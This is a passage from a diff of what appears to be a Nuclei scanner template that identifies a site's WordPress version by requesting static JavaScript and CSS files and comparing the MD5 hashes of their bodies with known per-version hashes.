+ - "(\"205636ab90b157901d261ffabf4480d6\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"bc83b1b178eb990c3eb122abe42f2674\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"3ad3ae90aca2f54e72b14fe7f0421ae9\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"4ac9627f33575a6afaf4144704daecc2\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"0b13139d53176ef58565bdaa8b8190d4\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"b2517aad471230737b19eca7939536c6\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"d505be245b85486a9f2baffd711ae655\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"f744caaf733436017d261ed10764b05c\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"38ff988c7537bbaaefdc12d1f55f26f7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"f088ac384e6c8faec370911468e89703\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.4 + dsl: + - "(\"45c3a5624225a7c168e9e697c546ef56\" == md5(body))" + - type: dsl + name: 4.9.5 + dsl: + - "(\"81d53dec5df1b4d291cacaff561a54c9\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"80b33095e5ba53fee0a8f993e1bffaf9\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"7db21b9f1e3f67da3217e7e8168283a0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"bd2dfc60cbf1637c94e4c0fc5883e104\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"e9a54610ecb282dbc20f643c7cf88826\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"794fdfb3cf964780644b034fce9fa3cc\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - "(\"495178701107d00bcbbe5e22a528f4a7\" == md5(body))" + - type: dsl + name: 4.3.21 - 4.3.25 + dsl: + - "(\"a096d02a1c5453efa2353f6ae84e0edc\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"622927b82f5f2da5640fd9951c427e6e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"9a6044f6a95fba2ccc9677358bbe0636\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"5ffe2bff63264b4e5a2fa4a78d1f9ace\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d2778f59ff5acf2a20714145e226a57e\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"5cb288283c7772f5ee256ed4fa268a27\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"6d1effc3f68c5237eb414e2bddf3f98b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"80feee694b2af663c10d9dba54277d36\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a4c607508a8d4a640f49a68259f82e7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-editor.min.js" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"d34ff4ff27d7fa2ccc1d763a30fafacf\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"16f721058fc92cf7ea8370c26468afb2\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"5b66060e4feb58f2e0a202c192d6200d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e6e27ef49195615b463c87a88ec2a344\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"0809e04dcb482d3d58d6ed4583a91317\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"d7d6cd35e4d2ec5d0d97d3dfd2b5907c\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"b90eaf940e8466e846c8093278fff7cc\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"9ea065431e81d79173a331e7cc39aaed\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"984146c92ba79d3cc6826eb4b74b13ce\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"6aa44bdd30f72a64c09407a77a56cbcd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4b523d8aab95c1b29b4a1f03da923379\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-editor.js" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"bf3671bb7d3cd57cf469504f4ed0984d\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"76e1095617e4010135c2d398d9d8c2be\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"39a0a9870ad473ff94d0aa5f3c8c6bf4\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"4ae65914d30d7a00379dabebc4bf0727\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"3d83c9e397d94fae5c21f7ed3963cd98\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"6455689843f1f7de02d6876bf7b5286b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"5f702adabf856834b3af0298d2fce54c\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"57dbdd04ec66190ee4d652c7f288de34\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"2d98d7b0fa43454b2d8ca1abc0062857\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"6c9f44b6af605c96b277f60d69fb8e7b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1def645391a69a654a6ac415c639ac44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/media-views.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"c2dc6122ad5ada23efd6dbb63cf4c3d7\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"07103bd9815f3c477bbf3f8af86c85ce\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"2a1ab38629d6f10178a0d200e7edaad1\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b6ce54d1cb6e16133d28aa02dc38100e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a6e655b44b1372c35d563b7904296ff7\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ff33874b8a636d534226e66ff2bd87f2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1a18ff7798302a2acb623692d8d08fd9\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bbdb5de2ffa1378d42a1e0c1e47704d6\" == md5(body))" + - type: dsl + name: 4.0.2 - 4.0.32 + dsl: + - "(\"d57104d16ab5d91ce66d05d88c1be33d\" == md5(body))" + - type: dsl + name: 4.0.1 + dsl: + - "(\"de3d0b7763542b94e4c86cf8c423013f\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"260dcaf7e6e2827dbca061b824b13dd0\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"a95f22c6fa0fb98706d8893661499efa\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"3e32684f6b23d052378e1199045e920b\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"592e1ebf1392317ac258a26eedabee05\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"da980f717b09961e77acea1f0832d779\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"cad366eb2eaf38f62aa97c073a4277a3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"31c7fd5c7249914b37af335db01fb3a8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"f85ffada1056f95bb4f1a7454c2a7a55\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"f884a49215e3b86f5b00b70357048349\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6528f823f107c824a8f037d59747ee86\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"cd980ca68442d6c7958aa25a1602be22\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"4b4b0b4618bcc9b8f3627314d31c7858\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"5b158afe0b4df51c1046ffcf6fac142a\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"e091f05329e13e2443004079007c3b9a\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"d1f608c17b5120eeb7d99c90f769a38e\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"14b7e4860e20a6ad3bd8497601265757\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"68de126da7badcb321e311e942d81af9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2c1edf5b9efbdf9bddfe780f822368bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/media-views-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1320986de5f4c511d2d91d49594bb55e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"75bcf36d04024586721bf54011740bb9\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"473143467093228d834df66130904558\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c36750a3abc2cb8458d5019eb51c7e1c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"283fbf3687b454b9af277c971112e1fe\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b809a39abbf9269fb8ca45854dee66e7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"745b6b6ebb69c22bc42f9780fe6a9f49\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ed5f4318d41d867af5241b53202f52dd\" == md5(body))" + - type: dsl + name: 4.0.2 - 4.0.32 + dsl: + - "(\"14321055939c72056c29da4fac03ebf4\" == md5(body))" + - type: dsl + name: 4.0.1 + dsl: + - "(\"a119e12e638192f47f133c28c9c259c4\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"d1703dff57c8a79d200a3cd8671be1a3\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"00596a3f53c0ed5f0980487bec09e24b\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"ecf3c4b2f07fdae92ad2b7610afabe7f\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"40ecf9d68327bdeaeb7c50bf53483a4f\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"748955e10d038a00280de9ffe656f09d\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"7dff4cd1a1c6a83b48aa548a885d9368\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"d2d68944a09ea1e709f2f0167c9ed0d5\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d88590682bee1fa2d8e8fd2098613e1e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"43dba56c280798e030a3eb57d13d117d\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"cfa39e76d5951ec19fb374fcc68722a4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2731739447719c2c138c09d4effe827e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"6f46bbbba6d72269891ebf1db8e43d1f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"c72ac701e7e8604deef6d6b554c77d41\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"fcb870e743c4db730c63c9d050b22dde\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"e7433c5d289d445bbfe8592e637916fc\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"ca85d793557e7f488c1f3a4efa5e312b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"59e457e75b241e4d9332bf32b9376d9a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5ee99fab2abde70aa52780512dd604b5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0e9401a708382afec03c638511dd6817\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/common.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"25d6aacf8fe73d5b07b4e82751479f05\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"6f2235eef66da7f38777c524a9c36205\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.4 + dsl: + - "(\"a4a413ce024e8152e0f8956011d325fa\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"adc2e2546deb48d1564f5392650d2a05\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f963adf2a7fb1a7c1c4199e204fc0d20\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fa1a35d8d7342fbcfd255b456415e0c3\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"e4400cac6b36526d679230e8b9dd9f1d\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"f83bef152421e22d8f14f2fb344f3410\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b9c9f646d31ae6d74e97bc6b4d4a5c0a\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"3be9a7101e7a7635833c7321cf2017e5\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"d3a3f5d88670f6fea04b6f523f67b528\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"d16dd6c3f76ad777188cc5708adda0c3\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"a915138d60305201313066d43c61a2f6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"24e5c1257b59677997a60bf7035f16c5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1cd324e7b6c46227e0f302337e762bcd\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.33 + dsl: + - "(\"4f9383d80d7b2a9947e9de21451226f9\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"58f2b7e3399f78ca0ab6aaa0a826bafc\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"886b5ea55729f7016211cf324af5e897\" == md5(body))" + - type: dsl + name: 3.6.1 + dsl: + - "(\"b45d244b6669aef59434fc30265f01f9\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"bfe3d59f6e7d5045d07f9835827d1324\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4b224e92257f97279f786973002b496d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"febc435f5a360e41a7b2b6cb2368af70\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"565c5b71c17d0f75bdeea5361b44b599\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"617d7413ace49ebdbde150e781a0fc64\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b11a0315c72981b2196bbe2bdcf0f75d\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"7cf98465a10b9d8c17cb3ea03a485875\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"58d9399f392d2fed4fa0430a68d53258\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"c9bd46200ead1003ef035b256ba9152f\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"d882c62db3212caee8464d76f47eae4a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fd645ad5b0c96e6aa8bdc86c29bf998f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"177b13403b4c1d6ea0025572ac1b0b12\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"e97b439d9f0c638e88d8a4cc21823025\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"2bb48c16cf49b06d70fea86fe99edfff\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"4016c604bcec8a6544c2c966cb8e6925\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"73eb43b774ec35091006e8d0d8b41eb1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"aa25a3e29dd3a6af01e4fb6f80db10be\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"624d68ea15072444280b4f4e4f4522ec\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"4a459a304909052c6cdf05393599790b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a87f03a14efd9b8531164dac272aa07c\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1cbc0ca7cf2f6a0991a4da7cad7bd9c0\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"b5f9c498a1098ebdfbc2fa321f8bdf40\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"9ed346f17ea5f8a7d4f30d96003de9b1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"3b4ec67bdb6e4f311418ac5b8c302005\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"17f5a58fc4d053bffb8cb79efbb603a0\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c599b07c5f3d814e9d0adf6ae57885df\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"fc895acd6895683e3014a5f5e7d9cbed\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"aa297505c208b2b6860af82106d985ca\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"84a599e6afa0ba8b5a00af97787ac52d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"492999721e753fc439107d980fd6f1bb\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"7234119d4cfae6ce5b9ad7689bde2b27\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"861f75019aa280e0b92aa0f9c9b84eaf\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"2ec44853d924b9eb24ff3cde0986aaaf\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"049a4b5288c49f627f02b150bc28a8be\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8f9006245f6630fe4dd7c0768668ea6d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"517db4d19d1e3484a0339dc765cd3902\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c449b708d25d875ac9266227666fef95\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"b440cfaf53dc78b60e479c8e43df12d1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1e7b5cfcfc656cad1c8dcd3bb09ee8ca\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6c1db6b35d1f5b39a367f03fbbb6363e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"702dabe21678b2f96b0c3fac9ca9eecf\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"ede40a4a2c18bee8b93c01f7e55245a8\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b5bac004a9dd8890f14b020f7f548040\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e97cda60d14a219554405c5df6047a54\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ef190537aee285d82bb5fe4c5da5e769\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c178ee058ec19c709f30baed82db8392\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"68e539081693b1ed4a42bf1c284004e6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"8f73d561f6b239083463a5b1ea50d035\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"31d0d7ea28f6021402faeb6c25b7f24b\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"319ae2dfe4ba7ad0b5c1da8c5035205d\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"1e3ac8152f5ff972260ce1bd50bde322\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"7e89f21add33a9ee22decb147300999a\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"41abd505872ec8ad7625b81f5127546d\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0b99a456a17fe95b10a8c7cf90d62303\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"9c505ae63a80736883260c90740e2e7c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0e0efc8f81e44620d3e1b3360fb8c492\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"2b1e8f9afa852875136abc86f8db2971\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"f43654c38bdb2158af5d710dba80f5bd\" == md5(body))" + - type: dsl + name: 4.9.8 + dsl: + - "(\"1b298abbb4fc1c8a793ab429afbac7a7\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"1aef04d8948c142c1e238d7c5d261a1c\" == md5(body))" + - type: dsl + name: 4.9.9 + dsl: + - "(\"117c2f9b3f7bb835979c8181c4bb4487\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"eba9cfc7bfc0ee9b9b41b6e57b951076\" == md5(body))" + - type: dsl + name: 4.9.10 - 4.9.16 + dsl: + - "(\"776fe952791cbf65cbef30a3828f94dc\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e75bc9587fbb4bbf66b3e6165c4b96d2\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7ef55edc418714bcd23d68126ad77914\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"6de79274a839f563f9c4233eaf2c41d0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c155cc474428d39c756c4d0b259e0fda\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9142efd37952e7c5975acae53d56774b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"baaf01bcea21f0d7518fdbb36fee9134\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/media-views-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"e9b56ecbae4ea9a783fbbd5c7d600e2a\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"501cf1920c7156d8fc36d09906b89b96\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"0f5b4dc649f5d2218067a8c37e7c1bab\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fa5c93754d9aaef90f7e56b8f530953f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a00d887d69696c4469e02f21cce67a2c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"fe2e1045e95e3356a585bb83c8958fe0\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ce5832715f15e339b10f1f35564c1e54\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"113badd2d3bd1c9cec6ae9b51cf9d14a\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"596175f22e2a4fda17b151a548d943dc\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"d290d20fcf52a06c1576ce599294b0ec\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"fa31efdb33a5f6043c48bf062b78d306\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"0896c8e772550ccc25dbf41ad56828f6\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"eda317820fb1056837abb407ce52dd04\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"340776735208b7aa98106a0ac81ebeba\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"82886b7f245be648136f1d1633d7679d\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d8606417bf53703b949f2b69f20950cd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"03376b367c5b4d20cf8b8f4bc57f9899\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"fb3b1ff76a82bbf28c67694645d20343\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b428a1ab8ea43aa8b32f70f567adbbcd\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"dfd4a99ee490100037c2fffb64b476af\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"7953c80077f3153b928f51614f2e1d73\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"cd9ae7fa20656d6518f8b02d41f543cd\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"aa26cc77c06589e911cab9b7a0e1f948\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"9df090212f0362c5ce6510e574a8bedf\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"8664869848abca0bd76593b7940f229c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"74c9253d442013dc9c4004e7fb5f8ad0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3853f794c6941d2d221ffb81d657bab0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/media-views.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0e78a2b0ea5e6d76af956e6db3c6d387\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"8da4dec91cff43f7f5dc6e44746ed049\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"251ddd705433c207dac4dc90b01abbe3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fbadbb1f370542f387ec6449a41869a5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5c63b51785fe9035948a1556dfec5204\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6002f66791922cb455a1cbdcfb3e5d6e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"cec1bd5b35322ae89736b592fd56f90d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"34039211eb84b4c4ef8f040e7da8fb01\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"c3b623bad8cdeb9189d7ee1e6c4b6840\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"a1ed9196e49fd033bff15737cbd393ef\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"b15bc1e4a10cd3cd2e9e1a8af26cb82c\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"d88c98cdb5bf2fe29417d2b92f5288c7\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 